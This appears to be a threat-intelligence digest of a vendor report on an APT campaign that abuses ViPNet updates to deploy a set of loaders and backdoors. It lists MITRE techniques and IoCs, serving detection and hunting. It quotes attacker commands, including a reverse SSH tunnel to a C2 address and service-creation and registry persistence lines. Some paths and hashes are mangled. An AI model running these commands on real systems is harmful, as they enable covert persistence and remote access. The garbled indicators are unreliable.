A new APT campaign has been abusing the ViPNet update system to deploy HelloInjector, HelloProxy, HelloExecutor, HelloCleaner, and HelloBackdoor against large Russian organizations across multiple sectors since at least May 2026. The activity has been linked with low confidence to an unknown Chinese-speaking APT group and includes SSH tunneling, svchost.exe injection, and network/file-system reconnaissance against ViPNet-related environments. #ViPNet #HelloInjector #HelloProxy #HelloExecutor #HelloCleaner #HelloBackdoor #Kaspersky #PuTTY #Plink #svchost.exe
Keypoints
- The campaign started at least in May 2026 and was still active at publication time.
- Attackers abused the ViPNet update system to achieve persistence through DLL sideloading and malicious file placement.
- The loader HelloInjector injected code into svchost.exe and launched payloads from memory.
- HelloProxy acted as both a proxy and loader, intercepted socket-related functions, and listened on ports 5003 and 5060.
- HelloExecutor was used for reconnaissance inside infected networks using standard Windows commands and directory listing.
- HelloBackdoor was a Rust-based backdoor that accepted commands over TCP port 443 and supported file upload, download, and stop operations.
- Kaspersky described detections through EDR, KATA, MDR, and SIEM rules, and provided IoCs and hunting guidance for ViPNet-related compromise.
MITRE Techniques
- [T1574.001 ] DLL Search Order Hijacking – Used for persistence by placing wtsapi32.dll in the ViPNet update directory so it would be loaded by itcsrvup64.exe at startup (‘the attackers implement the DLL Sideloading technique’).
- [T1055 ] Process Injection – HelloInjector injected into svchost.exe using NtWriteVirtualMemory and NtCreateThreadEx (‘inject its code into the svchost.exe process’).
- [T1105 ] Ingress Tool Transfer – The loader accepted an executable from the command server and loaded it into memory (‘accepts an executable file from the command server’).
- [T1090 ] Proxy – HelloProxy forwarded traffic between sockets and also worked as a hidden proxy (‘creates new sockets and starts forwarding traffic between them’).
- [T1021.004 ] Remote Services: SSH – Attackers launched SSH tunnels with renamed PuTTY/plink binaries (‘frontpage.exe -C -N -R 8443:[redacted]:5003 [email protected][.]206’).
- [T1036 ] Masquerading – A legitimate PuTTY utility was renamed to frontpage.exe to conceal its use (‘a renamed executable file of the legitimate PuTTY utility’).
- [T1562.001 ] Impair Defenses: Disable or Modify Tools – HelloProxy intercepted socket-related functions to hinder security solutions (‘hinder security solutions operating in user mode for filtering network connections’).
- [T1049 ] System Network Connections Discovery – Reconnaissance included netstat and other network checks (‘ipconfig /all’, ‘ping 8.8.8.8 -n 1’).
- [T1016 ] System Network Configuration Discovery – The attackers collected network configuration with standard tools (‘ipconfig /all’).
- [T1018 ] Remote System Discovery – They used ping and network-related checks to identify reachable systems (‘ping 8.8.8.8 -n 1’).
- [T1082 ] System Information Discovery – HelloExecutor ran systeminfo-style environment discovery via standard commands (‘query user’, ‘dir’).
- [T1057 ] Process Discovery – Process enumeration was performed during reconnaissance (‘query user’).
- [T1007 ] System Service Discovery – The campaign used service-related commands to inspect services (‘net group /do’, service-related checks).
- [T1083 ] File and Directory Discovery – Numerous dir commands enumerated ViPNet and user directories (‘dir “C:Program Files (x86)”‘, ‘dir C:UsersPublicmusic’).
- [T1005 ] Data from Local System – HelloBackdoor supports file download/upload and reads local data (‘!upload’, ‘!down’).
- [T1074.001 ] Local Data Staging – Data was copied into public directories for later use (‘copy appdatainfotecs*APN000B.txt $publiclibraries’).
- [T1070.004 ] Indicator Removal: File Deletion – The attackers deleted files and logs to hide activity (‘del $publiclibrariesAPN000B.txt’).
- [T1543.003 ] Create or Modify System Process: Windows Service – The observed TTPs included service creation and modification (‘sc create AppMgmt …’).
- [T1112 ] Modify Registry – Registry keys were changed to set service DLL behavior (‘reg add HKLMSYSTEMCurrentControlSetServicesAppMgmtParameters’).
- [T1059.003 ] Windows Command Shell – Many commands were executed through cmd.exe (‘”cmd” /c systeminfo’).
- [T1218 ] Signed Binary Proxy Execution – AutoIt and other trusted binaries were used as proxy execution (‘autoit3.exe … data.dat’).
- [T1572 ] Protocol Tunneling – SSH port forwarding was used to tunnel traffic (‘-R 6443:[redacted] [email protected]’).
Indicators of Compromise
- [IP address] C2 / tunneling endpoints – 5.39.253[.]206, 176.32.34[.]135
- [File name] Malicious loader and payload-related files – wtsapi32.dll, frontpage.exe
- [File name] Additional droppers and utilities – puh.exe, store.exe, amgmt.dll, amgmt.bat
- [File hash] HelloBackdoor and related samples – 16C211C96735F2FAE9361B89BD7A31BF1BFE2B9493128574907A8279256A8BCCf9eed2f0158dc98e7012fb809152209c, B103CD21280B4061F88B2BCC513948949F5606A0755BC633B9BD7DB6D179C09E0CFDFFC56F0FA325D0C4D24780B46597, and other hashes listed in the article
- [File hash] Droppers and utility hashes – 6001829A128FE264B4403138700C11A8, EE4FF46DDD8489E81447962F927BC3F6, 41c938b3cd7e55d4077e34976929b140
- [String / network marker] Backdoor activation and handshake values – 47c6235b4d2611184, ASDFASFSAFASDF, 0x0502
- [File path] ViPNet-related persistence locations – C:Program Files (x86)InfoTeCSVIPNet Update Systemwtsapi32.dll, C:userspublicmusicfrontpage.exe
- [Port] Network listening and callback ports – 5003, 5060, 443, 8443, 3522, 6443
Read more: https://securelist.com/tr/hellonet-vipnet/120700/